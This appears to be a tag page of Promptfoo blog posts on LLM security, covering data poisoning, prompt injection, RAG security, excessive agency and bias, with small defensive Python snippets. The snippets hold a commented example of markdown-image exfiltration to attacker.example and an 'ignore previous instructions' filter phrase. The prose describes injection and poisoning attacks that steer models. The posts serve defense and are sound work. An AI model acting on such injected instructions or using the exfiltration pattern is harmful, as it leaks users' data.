
19 posts tagged with "best-practices"


Defending Against Data Poisoning Attacks on LLMs: A Comprehensive Guide

Vanessa Sauter
Principal Solutions Architect

Data poisoning remains a top concern on the OWASP Top 10 for 2025. However, the scope of data poisoning has expanded since the 2023 version. Data poisoning is no longer strictly a risk during the training of Large Language Models (LLMs); it now encompasses all three stages of the LLM lifecycle: pre-training, fine-tuning, and retrieval from external sources. OWASP also highlights the risk of model poisoning from shared repositories or open-source platforms, where models may contain backdoors or embedded malware.

When exploited, data poisoning can degrade model performance, produce biased or toxic content, exploit downstream systems, or tamper with the model's generation capabilities.

Understanding how these attacks work and implementing preventative measures is crucial for developers, security engineers, and technical leaders responsible for maintaining the security and reliability of these systems. This comprehensive guide delves into the nature of data poisoning attacks and offers strategies to safeguard against these threats.
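One preventative measure worth calling out up front, given the risk of backdoored or malware-laden models on shared repositories, is verifying artifact integrity before loading anything. Below is a minimal Python sketch, assuming you pin a known-good SHA-256 digest for each third-party model file; the filename and digest are placeholders, not real values:

```python
import hashlib
from pathlib import Path

# Hypothetical allowlist: artifact filename -> SHA-256 digest published by a trusted source.
PINNED_DIGESTS = {
    "example-model.safetensors": "9f2c1a...",  # placeholder digest; replace with the published value
}

def verify_model_artifact(path: str) -> bool:
    """Return True only if the file exists and its SHA-256 matches the pinned digest."""
    artifact = Path(path)
    if not artifact.is_file():
        return False
    digest = hashlib.sha256(artifact.read_bytes()).hexdigest()
    expected = PINNED_DIGESTS.get(artifact.name)
    return expected is not None and digest == expected

if not verify_model_artifact("models/example-model.safetensors"):
    raise RuntimeError("Model artifact failed integrity check; refusing to load.")
```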

Beyond DoS: How Unbounded Consumption is Reshaping LLM Security

Vanessa Sauter
Principal Solutions Architect

The recent release of the 2025 OWASP Top 10 for LLMs brought a number of changes in the top risks for LLM applications. One of the changes from the 2023 version was the removal of LLM04: Model Denial of Service (DoS), which was replaced in the 2025 version with LLM10: Unbounded Consumption.

So what is the difference between Model Denial of Service (DoS) and Unbounded Consumption? And how do you mitigate risks? We'll break it down in this article.
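As a preview of the mitigations, the two most common controls are a per-user rate limit and a hard cap on output tokens per request. Here is an illustrative Python sketch under assumed limits; the numbers are examples to tune against your own cost model, not recommendations:

```python
import time
from collections import defaultdict, deque

# Illustrative limits; tune these to your own cost and latency budget.
MAX_OUTPUT_TOKENS = 1024        # hard cap on generation length per request
MAX_REQUESTS_PER_MINUTE = 20    # per-user rate limit
_request_log = defaultdict(deque)

def allow_request(user_id: str) -> bool:
    """Sliding-window rate limiter: reject callers that exceed the per-minute budget."""
    now = time.time()
    window = _request_log[user_id]
    while window and now - window[0] > 60:
        window.popleft()
    if len(window) >= MAX_REQUESTS_PER_MINUTE:
        return False
    window.append(now)
    return True

def build_completion_params(prompt: str) -> dict:
    # Always pass an explicit output cap so a single request can't run unbounded.
    return {"prompt": prompt, "max_tokens": MAX_OUTPUT_TOKENS, "timeout": 30}
```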

Leveraging Promptfoo for EU AI Act Compliance

Vanessa Sauter
Principal Solutions Architect

Beginning on February 2, 2025, the first prohibitions against certain AI systems will take effect in the European Union under the EU AI Act.

The Act, which is the first comprehensive legal framework of its kind to regulate AI systems, entered into force on August 1, 2024 and will roll out mandatory provisions through August 2026. The purpose of the Act is to regulate broadly defined AI systems, particularly those classified as high-risk, such as AI deployed in healthcare, education, employment, public services, law enforcement, migration, and the legal system.

Anyone who develops, uses, imports, or distributes AI systems within the EU, regardless of where they are located, will fall under the scope of this regulation.

RAG Data Poisoning: Key Concepts Explained

Ian Webster
Engineer & OWASP Gen AI Red Teaming Contributor

AI systems are under attack - and this time, it's their knowledge base that's being targeted. A new security threat called data poisoning lets attackers manipulate AI responses by corrupting the very documents these systems rely on for accurate information.

Retrieval-Augmented Generation (RAG) was designed to make AI smarter by connecting language models to external knowledge sources. Instead of relying solely on training data, RAG systems can pull in fresh information to provide current, accurate responses. With over 30% of enterprise AI applications now using RAG, it's become a key component of modern AI architecture.

But this powerful capability has opened a new vulnerability. Through data poisoning, attackers can inject malicious content into knowledge databases, forcing AI systems to generate harmful or incorrect outputs.


These attacks are remarkably efficient - research shows that just five carefully crafted documents in a database of millions can successfully manipulate AI responses 90% of the time.
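One practical defense is to filter retrieved chunks before they ever reach the prompt. The Python sketch below assumes your ingestion pipeline tags each chunk with a `source` field; the source names and suspicious phrases are placeholders meant to illustrate a provenance allowlist plus a crude injection check, not a complete detector:

```python
# Hypothetical provenance filter applied before retrieved chunks reach the prompt.
TRUSTED_SOURCES = {"internal-wiki", "confluence", "sharepoint"}  # assumption: chunks carry a "source" tag

def filter_retrieved_chunks(chunks: list[dict]) -> list[dict]:
    """Drop chunks that lack a trusted source or that contain obvious instruction-injection phrases."""
    suspicious_phrases = ("ignore previous instructions", "you must always answer")
    safe = []
    for chunk in chunks:
        if chunk.get("source") not in TRUSTED_SOURCES:
            continue  # unknown provenance: exclude from the context window
        text = chunk.get("text", "").lower()
        if any(phrase in text for phrase in suspicious_phrases):
            continue  # quarantine for review rather than passing to the model
        safe.append(chunk)
    return safe
```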

How Do You Secure RAG Applications?

Vanessa Sauter
Principal Solutions Architect

In our previous blog post, we discussed the security risks of foundation models. In this post, we will address the concerns around fine-tuning models and deploying RAG architecture.

Creating an LLM as complex as Llama 3.2, Claude Opus, or GPT-4o is the culmination of years of work and millions of dollars in computational power. Most enterprises will strategically choose foundation models rather than create their own LLM from scratch. These models function like clay that can be molded to business needs through system architecture and prompt engineering. Once a foundation model has been selected, the next step is determining how the model can be applied and where proprietary data can enhance it.

Prompt Injection: A Comprehensive Guide

Ian Webster
Engineer & OWASP Gen AI Red Teaming Contributor

In August 2024, security researcher Johann Rehberger uncovered a critical vulnerability in Microsoft 365 Copilot: through a sophisticated prompt injection attack, he demonstrated how sensitive company data could be secretly exfiltrated.

This wasn't an isolated incident. From ChatGPT leaking information through hidden image links to Slack AI potentially exposing sensitive conversations, prompt injection attacks have emerged as a critical weak point in LLMs.

And although prompt injection has been a known issue for years, foundation labs still haven't been able to stamp it out entirely, though mitigations are constantly being developed.
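One commonly used mitigation for the exfiltration pattern above is to sanitize model output before it is rendered, stripping markdown links and images that point at untrusted hosts. The following Python sketch assumes a hypothetical host allowlist and is illustrative only:

```python
import re

# Assumption: your UI renders markdown, so an injected image like
# ![x](https://attacker.example/?q=<secret>) would exfiltrate data when it loads.
ALLOWED_LINK_HOSTS = {"docs.example.com"}  # hypothetical allowlist of hosts safe to render

MD_IMAGE_OR_LINK = re.compile(r"!?\[[^\]]*\]\((https?://[^)\s]+)\)")

def sanitize_model_output(text: str) -> str:
    """Replace markdown links/images pointing at hosts outside the allowlist."""
    def _replace(match: re.Match) -> str:
        url = match.group(1)
        host = re.sub(r"^https?://", "", url).split("/")[0]
        return match.group(0) if host in ALLOWED_LINK_HOSTS else "[link removed]"
    return MD_IMAGE_OR_LINK.sub(_replace, text)
```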

Understanding Excessive Agency in LLMs

Ian Webster
Engineer & OWASP Gen AI Red Teaming Contributor

Excessive agency in LLMs is a broad security risk where AI systems can do more than they should. This happens when they're given too much access or power. There are three main types:

  1. Too many features: LLMs can use tools they don't need
  2. Too much access: AI gets unnecessary permissions to backend systems
  3. Too much freedom: LLMs make decisions without human checks

This is different from insecure output handling. It's about what the LLM can do, not just what it says.

Example: A customer service chatbot that can read customer info is fine. But if it can also change or delete records, that's excessive agency.

The OWASP Top 10 for LLM Apps lists this as a major concern. To fix it, developers need to carefully limit what their AI can do.
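In practice, limiting what the AI can do often comes down to gating which tools the model is allowed to call. The sketch below uses a hypothetical tool registry in which any state-mutating tool requires explicit human approval; the tool names are illustrative and not tied to any specific framework:

```python
# Hypothetical tool registry: each tool declares whether it mutates state.
TOOLS = {
    "get_customer_record": {"mutates": False},
    "update_customer_record": {"mutates": True},
    "delete_customer_record": {"mutates": True},
}

def execute_tool(name: str, args: dict, human_approved: bool = False) -> dict:
    """Expose read-only tools freely; mutating tools require explicit human sign-off."""
    tool = TOOLS.get(name)
    if tool is None:
        raise PermissionError(f"Unknown tool: {name}")
    if tool["mutates"] and not human_approved:
        raise PermissionError(f"Tool '{name}' requires human approval before execution.")
    # ... dispatch to the real implementation here ...
    return {"tool": name, "args": args, "status": "executed"}
```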

Preventing Bias & Toxicity in Generative AI

Ian Webster
Engineer & OWASP Gen AI Red Teaming Contributor

When asked to generate recommendation letters for 200 U.S. names, ChatGPT produced significantly different language based on perceived gender - even when given prompts designed to be neutral.

In political discussions, ChatGPT responded with a significant and systematic bias toward specific political parties in the US, UK, and Brazil.

And on the multimodal side, OpenAI's DALL-E was much more likely to produce images of black people when prompted for images of robbers.

There is no shortage of other studies that have found LLMs exhibiting bias related to race, religion, age, and political views.

As AI systems become more prevalent in high-stakes domains like healthcare, finance, and education, addressing these biases is necessary to build fair and trustworthy applications.
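A lightweight way to start measuring this is a paired-prompt probe: hold the request constant, vary only the demographic signal (here, a name), and compare the outputs. The Python sketch below is illustrative; `call_model` is a placeholder for your own model client, and the name pairs echo those used in well-known résumé audit studies:

```python
# Minimal paired-prompt bias probe: same request, different name, diff the responses.
NAME_PAIRS = [("Emily", "Jamal"), ("Greg", "Lakisha")]  # illustrative name pairs
PROMPT = "Write a short recommendation letter for {name}, a software engineer with 5 years of experience."

def call_model(prompt: str) -> str:
    raise NotImplementedError("Replace with your model client, e.g. an OpenAI or Anthropic call.")

def run_bias_probe() -> None:
    for name_a, name_b in NAME_PAIRS:
        response_a = call_model(PROMPT.format(name=name_a))
        response_b = call_model(PROMPT.format(name=name_b))
        # Compare length as a crude first signal; sentiment or adjective analysis goes further.
        print(name_a, len(response_a.split()), "words vs", name_b, len(response_b.split()), "words")
```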


How Much Does Foundation Model Security Matter?

Vanessa Sauter
Principal Solutions Architect

At the heart of every Generative AI application is the LLM foundation model (or models) used. Since LLMs are notoriously expensive to build from scratch, most enterprises will rely on foundation models that can be enhanced through few-shot or many-shot prompting, retrieval-augmented generation (RAG), and/or fine-tuning. Yet what are the security risks that should be considered when choosing a foundation model?

In this blog post, we'll discuss the key factors to consider when choosing a foundation model.